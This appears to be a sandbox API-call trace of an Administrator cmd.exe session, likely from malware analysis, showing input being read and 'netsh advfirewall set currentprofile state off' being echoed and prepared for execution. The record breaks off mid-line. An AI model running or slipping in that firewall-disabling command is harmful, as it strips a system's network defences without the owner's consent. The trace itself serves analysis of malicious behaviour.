[0124.422] _get_osfhandle (_FileHandle=0) returned 0xac [0124.422] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.422] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e350, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0124.422] _get_osfhandle (_FileHandle=0) returned 0xac [0124.422] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.422] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e352, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0124.422] _get_osfhandle (_FileHandle=0) returned 0xac [0124.422] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.422] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e354, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0124.422] _get_osfhandle (_FileHandle=0) returned 0xac [0124.422] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.422] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e356, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0124.422] _get_osfhandle (_FileHandle=0) returned 0xac [0124.422] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.422] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e358, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0124.422] _get_osfhandle (_FileHandle=0) returned 0xac [0124.422] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.422] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.422] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35a, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0124.423] _get_osfhandle (_FileHandle=0) returned 0xac [0124.423] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.423] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0124.423] _get_osfhandle (_FileHandle=0) returned 0xac [0124.423] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.423] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e35e, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0124.423] _get_osfhandle (_FileHandle=0) returned 0xac [0124.423] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.423] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e360, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0124.423] _get_osfhandle (_FileHandle=0) returned 0xac [0124.423] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.423] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e362, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0124.423] _get_osfhandle (_FileHandle=0) returned 0xac [0124.423] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.423] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e364, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0124.423] _get_osfhandle (_FileHandle=0) returned 0xac [0124.423] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.423] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.423] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e366, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0124.424] _get_osfhandle (_FileHandle=0) returned 0xac [0124.424] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.424] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e368, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0124.424] _get_osfhandle (_FileHandle=0) returned 0xac [0124.424] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.424] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36a, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0124.424] _get_osfhandle (_FileHandle=0) returned 0xac [0124.424] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.424] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0124.424] _get_osfhandle (_FileHandle=0) returned 0xac [0124.424] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.424] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e36e, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0124.424] _get_osfhandle (_FileHandle=0) returned 0xac [0124.424] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.424] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e370, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0124.424] _get_osfhandle (_FileHandle=0) returned 0xac [0124.424] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.424] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.424] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e372, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0124.424] _get_osfhandle (_FileHandle=0) returned 0xac [0124.425] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.425] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e374, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0124.425] _get_osfhandle (_FileHandle=0) returned 0xac [0124.425] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.425] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e376, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0124.425] _get_osfhandle (_FileHandle=0) returned 0xac [0124.425] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.425] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e378, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0124.425] _get_osfhandle (_FileHandle=0) returned 0xac [0124.425] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.425] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e37a, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0124.425] _get_osfhandle (_FileHandle=0) returned 0xac [0124.425] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.425] ReadFile (in: hFile=0xac, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x20f8d8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x20f8d8*=0x1, lpOverlapped=0x0) returned 1 [0124.425] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e37c, cchWideChar=1 | out: lpWideCharStr="\n") returned 1 [0124.426] _get_osfhandle (_FileHandle=0) returned 0xac [0124.426] GetFileType (hFile=0xac) returned 0x3 [0124.426] _get_osfhandle (_FileHandle=0) returned 0xac [0124.426] SetFilePointer (in: hFile=0xac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.427] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.427] GetFileType (hFile=0xb8) returned 0x3 [0124.427] _get_osfhandle (_FileHandle=1) returned 0xb8 [0124.427] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="netsh advfirewall set currentprofile state off\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="netsh advfirewall set currentprofile state off\n", lpUsedDefaultChar=0x0) returned 48 [0124.427] WriteFile (in: hFile=0xb8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x20f8b8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x20f8b8*=0x2f, lpOverlapped=0x0) returned 1 [0124.427] GetProcessHeap () returned 0x2e0000 [0124.427] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x2fb240 [0124.427] GetProcessHeap () returned 0x2e0000 [0124.427] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb240 | out: hHeap=0x2e0000) returned 1 [0124.427] _wcsicmp (_String1="netsh", _String2=")") returned 69 [0124.427] _wcsicmp (_String1="FOR", _String2="netsh") returned -8 [0124.427] _wcsicmp (_String1="FOR/?", _String2="netsh") returned -8 [0124.427] _wcsicmp (_String1="IF", _String2="netsh") returned -5 [0124.427] _wcsicmp (_String1="IF/?", _String2="netsh") returned -5 [0124.427] _wcsicmp (_String1="REM", _String2="netsh") returned 4 [0124.427] _wcsicmp (_String1="REM/?", _String2="netsh") returned 4 [0124.427] GetProcessHeap () returned 0x2e0000 [0124.427] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f97c0 [0124.427] GetProcessHeap () returned 0x2e0000 [0124.428] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1c) returned 0x2f4610 [0124.428] GetProcessHeap () returned 0x2e0000 [0124.428] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x64) returned 0x2f9880 [0124.429] GetConsoleOutputCP () returned 0x1b5 [0124.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0124.429] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.430] GetConsoleTitleW (in: lpConsoleTitle=0x20f870, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a [0124.430] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0124.430] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0124.430] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0124.430] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0124.430] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0124.430] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0124.430] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0124.430] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0124.430] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0124.430] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0124.430] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0124.430] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0124.430] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0124.430] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0124.430] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0124.430] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0124.430] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0124.430] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0124.430] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0124.430] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0124.430] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0124.431] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0124.431] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0124.431] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0124.431] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0124.431] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0124.431] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0124.431] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0124.431] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0124.431] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0124.431] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0124.431] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0124.431] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0124.431] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0124.431] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0124.431] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0124.431] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0124.431] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0124.431] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0124.431] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0124.431] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0124.431] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0124.431] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0124.431] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0124.431] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0124.431] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0124.431] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0124.431] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0124.431] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0124.431] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0124.431] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0124.431] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0124.431] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0124.431] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0124.431] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0124.431] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0124.432] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0124.432] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0124.432] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0124.432] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0124.432] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0124.432] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0124.432] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0124.432] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0124.432] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0124.432] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0124.432] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0124.432] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0124.432] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0124.432] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0124.432] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0124.432] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0124.432] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0124.432] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0124.432] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0124.432] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0124.432] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0124.432] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0124.432] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0124.432] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0124.432] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0124.432] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0124.432] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0124.432] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0124.432] _wcsicmp (_String1="netsh", _String2="FOR") returned 8 [0124.432] _wcsicmp (_String1="netsh", _String2="IF") returned 5 [0124.432] _wcsicmp (_String1="netsh", _String2="REM") returned -4 [0124.433] GetProcessHeap () returned 0x2e0000 [0124.433] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2faa10 [0124.433] GetProcessHeap () returned 0x2e0000 [0124.433] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x70) returned 0x2f5b70 [0124.433] _wcsnicmp (_String1="nets", _String2="cmd ", _MaxCount=0x4) returned 11 [0124.433] GetProcessHeap () returned 0x2e0000 [0124.433] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x420) returned 0x2fb240 [0124.433] SetErrorMode (uMode=0x0) returned 0x0 [0124.433] SetErrorMode (uMode=0x1) returned 0x0 [0124.433] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2fb250, lpFilePart=0x20f100 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x20f100*="system32") returned 0x13 [0124.434] SetErrorMode (uMode=0x0) returned 0x1 [0124.434] GetProcessHeap () returned 0x2e0000 [0124.434] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2fb240, Size=0x44) returned 0x2fb240 [0124.434] GetProcessHeap () returned 0x2e0000 [0124.434] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2fb240) returned 0x44 [0124.434] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0124.434] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0124.434] GetProcessHeap () returned 0x2e0000 [0124.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x104) returned 0x2f9be0 [0124.434] GetProcessHeap () returned 0x2e0000 [0124.434] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1f8) returned 0x2f9cf0 [0124.439] GetProcessHeap () returned 0x2e0000 [0124.439] RtlReAllocateHeap (Heap=0x2e0000, Flags=0x0, Ptr=0x2f9cf0, Size=0x106) returned 0x2f9cf0 [0124.439] GetProcessHeap () returned 0x2e0000 [0124.439] RtlSizeHeap (HeapHandle=0x2e0000, Flags=0x0, MemoryPointer=0x2f9cf0) returned 0x106 [0124.439] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0124.439] GetProcessHeap () returned 0x2e0000 [0124.439] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xe8) returned 